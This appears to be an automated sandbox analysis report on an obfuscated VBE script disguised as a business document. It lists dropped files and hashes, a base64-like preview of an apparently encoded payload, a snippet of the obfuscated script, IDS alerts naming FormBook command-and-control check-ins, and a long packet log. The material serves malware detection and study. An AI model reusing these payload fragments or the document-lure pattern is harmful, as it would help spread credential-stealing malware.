                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):479288
                                                                                                    Entropy (8bit):5.9506112039986325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:CyevNDjwNJv4qAlrxrlXyogX58hg/cMqGz+IwAgviIFKRMcV//mILA/UzBlO3zp1:uvNvwnVARQ5saYGzDkeTXmAA/UzBlOX
                                                                                                    MD5:DBB9926D7E5CBD773BEC56143B2B98D9
                                                                                                    SHA1:A952FEED2CDC86BF953B0A330E089D6FF6C1949B
                                                                                                    SHA-256:2D1D4A1E7BC481E2BFF2EB434D4BDBD621217D23BEC14DE3F6A48AAB1991423F
                                                                                                    SHA-512:2B1CC8DD45509925F4F773B0821ABC74A0A326630B4D531364FCB50057C467ACCDC8CE09FC7D8B6A27D03F0662830F1CDCB913C8C4542BE36D2465084F90F35A
                                                                                                    Malicious:false
                                                                                                    Preview:6wI4nHEBm7tlEQ0AcQGb6wINiwNcJARxAZvrAj4TuXbkK3vrAskl6wKzboHpgu9+D+sCEGJxAZuB6fT0rGvrAnmm6wLjT3EBm+sCgyW6O/dIQXEBm3EBm3EBm+sCwvIxynEBm3EBm4kUC3EBm3EBm9HicQGb6wIYCYPBBOsCJcdxAZuB+VvBnwF8zXEBm+sC8RCLRCQEcQGb6wJ3bonDcQGb6wIBiYHDg1LJAHEBm3EBm7q095rhcQGbcQGbgfJY8bqR6wInVusC6auB8uwGIHDrAsVF6wLjrXEBm3EBm+sCUR5xAZuLDBBxAZvrAgCuiQwTcQGbcQGbQusCw8dxAZuB+jQDBQB11nEBm+sCXzuJXCQMcQGbcQGbge0AAwAA6wKegusCwrSLVCQIcQGb6wJ4yot8JARxAZtxAZuJ63EBm3EBm4HDnAAAAHEBm+sCesFT6wIeWOsCp0hqQHEBm+sCCkmJ63EBm3EBm8eDAAEAAADgrwFxAZvrAlKggcMAAQAA6wKwA+sC19ZT6wJOCusCPPeJ63EBm3EBm4m7BAEAAOsCZTZxAZuBwwQBAABxAZtxAZtT6wKbtnEBm2r/6wKehesCji6DwgXrAo9E6wIgTDH26wJz4XEBmzHJ6wI75esCzu6LGnEBm3EBm0HrAqR16wJ7cTkcCnXycQGbcQGbRusC4zNxAZuAfAr7uHXdcQGbcQGbi0QK/OsC0DHrAgvGKfBxAZtxAZv/0nEBm3EBm7o0AwUAcQGbcQGbMcDrArEgcQGbi3wkDHEBm+sC/w6BNAcT0mkJ6wJbOesCWtODwATrAi5B6wLzUjnQdeJxAZvrAhbwifvrAtSJcQGb/9frAhJ2cQGb5BWibAHHgQkT0mkx2YkPjMHqnoD2U4Ugpy1viNf72PYVh+DsqgQapp5TmBGaKEuI4pw8h89TqJFD9uUx7hUtBBNZgUiZtOzCkr5kCSeSy8WSlmQJin3tA5cu6H0e0pleNxrp9XZT
                                                                                                    File type:ASCII text, with CRLF line terminators
                                                                                                    Entropy (8bit):4.866478933134417
                                                                                                    TrID:
                                                                                                    • Visual Basic Script (13500/0) 100.00%
                                                                                                    File name:EL-25-536_40005512_Le Cuivre_23102024.vbe
                                                                                                    File size:535'441 bytes
                                                                                                    MD5:575f235ff45c6a6697fba7172ff403a8
                                                                                                    SHA1:d9ed6dc4fd26fbed5d50db60ac696d6eac1eed37
                                                                                                    SHA256:571c0365a3bd9d99f9df9c8e91473425db45064a304a4882f8b4e6d14ec6d81a
                                                                                                    SHA512:cc3c58aa16570a22adbd4df60066ab3f1955d42237fc260304c68ad5ea2ff914b61e4f605b41657f1cdfda6046fa0d41cd8cf01ad7df8fccbeba26322b4c3de0
                                                                                                    SSDEEP:6144:WP/7wXcaqEv2KDZNYZ1yh3x6ELev2ZMl0XUrvL6s0VNFNpi7oI9qhpY8cwLaxg8W:zUE2Oyc/eMMPrD30lIOY8ck5PLhkg
                                                                                                    TLSH:D7B44C75D96806660E4B27DAFC845A82CDBDC109162320F5FED9078D510A8ACF7FFB29
                                                                                                    File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla
                                                                                                    Icon Hash:68d69b8f86ab9a86
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-24T08:46:45.801662+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449738142.250.185.142443TCP
                                                                                                    2024-10-24T08:46:51.463960+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449740142.250.185.142443TCP
                                                                                                    2024-10-24T08:47:59.468104+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450008104.21.70.1180TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 24, 2024 08:46:05.175573111 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:05.175617933 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:05.175695896 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:05.212837934 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:05.212857962 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.117173910 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.117238045 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.118253946 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.118328094 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.122606993 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.122617006 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.122869015 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.137872934 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.183325052 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.496414900 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.543569088 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.543586969 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.547224998 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.547410965 CEST44349730142.250.185.78192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.547482014 CEST49730443192.168.2.4142.250.185.78
                                                                                                    Oct 24, 2024 08:46:06.558239937 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:06.558300972 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.558434963 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:06.558809996 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:06.558825016 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:07.411155939 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:07.411334991 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:07.415189028 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:07.415213108 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:07.415579081 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:07.418164015 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:07.459338903 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.244185925 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.244333982 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.245434046 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.245493889 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.361059904 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.361109018 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.361176014 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.361180067 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.361191034 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.361234903 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.361255884 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.361298084 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.361984968 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.362401962 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.362457037 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.362473011 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.369680882 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.369754076 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.369764090 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.378055096 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.378125906 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.378135920 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.386778116 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.386832952 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.386842966 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.395524025 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.395574093 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.395584106 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.404222012 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.404272079 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.404282093 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.413117886 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.413166046 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.413176060 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.465473890 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.478051901 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.478199005 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.478225946 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.478245020 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.478256941 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.478270054 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.478287935 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.479171038 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.479192019 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.479214907 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.479224920 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.479234934 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.479252100 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.480070114 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.480093002 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.480113029 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.480117083 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.480128050 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.480145931 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.486648083 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.486668110 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.486687899 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.486712933 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.486721992 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.486752033 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.486875057 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.486922979 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.486932039 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.495129108 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.495187998 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.495197058 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.496376991 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.496423006 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.496432066 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.502139091 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.502182007 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.502196074 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.507632017 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.507678986 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.507688999 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.513326883 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.513372898 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.513382912 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.518973112 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.519038916 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.519052982 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.524569035 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.524619102 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.524629116 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.530251026 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.530320883 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.530329943 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.535835981 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.535882950 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.535892963 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.541539907 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.541591883 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.541604042 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.547225952 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.547272921 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.547286987 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.590485096 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.595355988 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.595419884 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.595465899 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.595478058 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.595612049 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.595663071 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.595671892 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.595984936 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596014023 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596028090 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.596040010 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596118927 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.596127987 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596774101 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596805096 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596824884 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.596833944 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596865892 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596873045 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.596883059 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.596915960 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.596924067 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.597585917 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.597605944 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.597634077 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.597642899 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.597681999 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.601511955 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.605798960 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.605829954 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.605870008 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.605881929 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.605921984 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.609030008 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.611876965 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.611897945 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.611952066 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.611963034 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.612001896 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.614825010 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.617935896 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.617960930 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.618015051 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.618024111 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.618065119 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.620795012 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.623827934 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.623856068 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.623888016 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.623900890 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.623943090 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.626584053 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.629580021 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.629606962 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.629635096 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.629645109 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.629683971 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.632375002 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.635251045 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.635272026 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.635364056 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.635374069 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.635425091 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.638231039 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.640738010 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.640760899 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.640815973 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.640825987 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.641011000 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.643394947 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.646172047 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.646200895 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.646249056 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.646260977 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.646332979 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.648915052 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.651597023 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.651628971 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.651679039 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.651690960 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.651757956 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.654172897 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.656848907 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.656871080 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.656922102 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.656932116 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.656985044 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.659446955 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.662051916 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.662081003 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.662123919 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.662137032 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.662189007 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.664520025 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.666954041 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.667040110 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.667047977 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.667058945 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.667112112 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.669553995 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.712418079 CEST44349731142.250.186.97192.168.2.4
